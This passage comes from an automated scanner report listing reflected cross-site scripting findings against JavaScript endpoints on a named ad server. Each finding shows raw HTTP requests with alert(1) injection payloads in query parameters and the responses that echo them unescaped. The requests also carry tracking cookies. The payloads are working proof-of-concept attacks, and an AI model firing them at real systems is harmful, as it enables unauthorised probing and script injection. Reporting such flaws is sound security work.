FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1120:34260";alert(1)//38aea2a88ac;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1504B1120,1#822421|0,1,1;expires=Wed, 16 Mar 2011 01:15:05 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=54
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:15:05 GMT
Connection: close
Content-Length: 2866

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat=',34260";alert(1)//38aea2a88ac';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=,34260";alert(1)//38aea2a88ac;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                                                   var zzStr = "s=1;u=INmz6woBAD
...[SNIP]...

1.150. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f4e5'-alert(1)-'557283196c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?1f4e5'-alert(1)-'557283196c1=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; FFgeo=5386156; ZCBC=1; ZEDOIDX=29; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=1120,1,9; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFAbh=766B305,20|320_1#365; FFad=0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; __qca=P0-2130372027-1295906131971;

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 941
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=38
Expires: Mon, 14 Feb 2011 01:26:34 GMT
Date: Mon, 14 Feb 2011 01:25:56 GMT
Connection: close

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

p9.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-401/d3;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-401/d3/jsc/fm.js;qs=1f4e5'-alert(1)-'557283196c1=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.random();}

if(
...[SNIP]...

1.151. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16c4b'%3balert(1)//c3552fa4464 was submitted in the q parameter. This input was echoed as 16c4b';alert(1)//c3552fa4464 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=16c4b'%3balert(1)//c3552fa4464&$=&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:20 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=284
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:20 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='16c4b';alert(1)//c3552fa4464';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=16c4b';alert(1)//c3552fa4464;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.152. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cdf1d"%3balert(1)//afba566bf60 was submitted in the q parameter. This input was echoed as cdf1d";alert(1)//afba566bf60 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=cdf1d"%3balert(1)//afba566bf60&$=&s=1&z=0.7238910468295217 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=microsite.microsite-2011.lifestoryphotogallery.300x250.2.1;target=_blank;kvpersonid=148615818;kvfhid=1;sub1=Betty;sub2=Garrett;grp=5119389398;misc=4469713464
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143; ZCBC=1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,42,1; FFcat=305,4506,17:1120,1,9; FFad=0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:1,42,1;expires=Wed, 16 Mar 2011 01:29:19 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9:305,4506,17;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "19b436a-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=285
Expires: Mon, 14 Feb 2011 01:34:04 GMT
Date: Mon, 14 Feb 2011 01:29:19 GMT
Connection: close
Content-Length: 2116

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='cdf1d";alert(1)//afba566bf60';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=cdf1d";alert(1)//afba566bf60;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


                                               var zzStr = "s=1;u=INmz6woBADYAAHrQ5V4A
...[SNIP]...

1.153. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload befbf"%3balert(1)//9c15c465b7a was submitted in the q parameter. This input was echoed as befbf";alert(1)//9c15c465b7a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=befbf"%3balert(1)//9c15c465b7a&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=62
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:57 GMT
Connection: close
Content-Length: 2066

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='befbf";alert(1)//9c15c465b7a';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=befbf";alert(1)//9c15c465b7a;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;


...[SNIP]...

1.154. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12402'%3balert(1)//5f92dac5487 was submitted in the q parameter. This input was echoed as 12402';alert(1)//5f92dac5487 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /bar/v16-401/d3/jsc/fm.js?c=1&a=0&f=&n=1120&r=13&d=9&q=12402'%3balert(1)//5f92dac5487&$=&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://media2.legacy.com/adiframe/3.0/5306.1/1369112/0/-1/size=300x250/adtech;alias=legacy.legacy.home.300x250.2.1;target=_blank;grp=1473244827;misc=2328660423
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; __qca=P0-2130372027-1295906131971; ZEDOIDX=29; FFAbh=766B305,20|320_1#365; ZFFAbh=749B826,20|1643_1#382Z1483_768#365; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644:196642,196640:1025,196206,196207,95694|1,24,1:0,40,1:0,40,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1:0,27,1:0,27,1:0,40,1:0,42,3:0,40,1; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792:1190,2#684982,1#751890#675823#675820:1025,1#775786#834321#775734#775797#775796#834305#834300#835846#883311#835844#883313#835850:1120,1#619977|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:0,27,1:0,36,1:0,38,3:0,36,1:0,36,1:0,40,1:0,41,2:0,40,1:0,40,1:0,40,1:0,41,2:0,41,2:2,40,1:0,40,1:2,40,1:0,40,1:3,40,1:0,41,1; FFgeo=5386156; PI=h884566Za747317Zc305004506%2C305004506Zs916Zt143

Response (redirected)

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1504B1120,1#886265|0,1,1;expires=Wed, 16 Mar 2011 01:14:58 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1120,1,9;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 14 Feb 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=61
Expires: Mon, 14 Feb 2011 01:15:59 GMT
Date: Mon, 14 Feb 2011 01:14:58 GMT
Connection: close
Content-Length: 1925

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='12402';alert(1)//5f92dac5487';var zzCustom='';
if(typeof zzStr=='undefined'){
var zzStr="q=12402';alert(1)//5f92dac5487;z="+Math.random();}

if(zzuid=='unknown')zzuid='INmz6woBADYAAHrQ5V4AAACH~010411';

var zzhasAd=undefined;



...[SNIP]...

1.155. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [$ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bef81'%3balert(1)//7636571d18a was submitted in the $ parameter. This input was echoed as bef81';alert(1)//7636571d18a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=1&a=0&f=&n=1120&r=13&d=9&q=&$=bef81'%3balert(1)//7636571d18a&s=1&z=0.5481068452354521 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
